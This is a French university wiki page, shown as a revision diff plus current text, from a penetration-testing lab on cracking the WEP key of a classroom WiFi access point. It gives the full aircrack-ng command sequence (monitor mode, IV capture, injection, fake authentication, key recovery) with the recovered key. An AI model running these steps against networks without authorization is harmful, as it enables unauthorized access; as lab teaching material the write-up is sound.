TP sysres IMA5 2021/2022 G4 : Différence entre versions

De Wiki d'activités IMA
(5.2 Cassage de clef WEP d’un point d’accès WiFi)
Ligne 3 : Ligne 3 :
 
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===
 
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===
  
On va tout d'abord récupérer le nom de notre interface réseau grâce à la commande :
+
Cette commande sert à récupérer le nom de l'interface réseau:
 
  airmon-ng
 
  airmon-ng
  
On sait donc maintenant que notre interface réseau s'appelle wlan0mon (renommé automatiquement parce que celui de base était trop long)
+
Notre interface réseau s'appelle "wlan0mon" (renommé automatiquement parce que celui de base était trop long)
 
   
 
   
 
On démarre l'interface sur le channel 3 :
 
On démarre l'interface sur le channel 3 :
Ligne 23 : Ligne 23 :
 
  aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon
 
  aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon
  
La clef WEP est décriptable :
+
La clef WEP est alors décriptable :
 
  aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap
 
  aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap
  

Version du 11 octobre 2021 à 17:49

Tests D'intrusions

5.2 Cassage de clef WEP d’un point d’accès WiFi

Cette commande sert à récupérer le nom de l'interface réseau:

airmon-ng

Notre interface réseau s'appelle "wlan0mon" (renommé automatiquement parce que celui de base était trop long)

On démarre l'interface sur le channel 3 :

airmon-ng start wlan0mon 3

On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP

airodump-ng wlan0mon 

On réalise un test d'injection sur cracotte10

aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon

On récupère les VI générés par le point d'accès pour les stocker dans output :

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon

On effectue de fausses authentifications

aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon

La clef WEP est alors décriptable :

aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap

Le résultat obtenu est le suivant :

KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] 
Decrypted correctly: 100%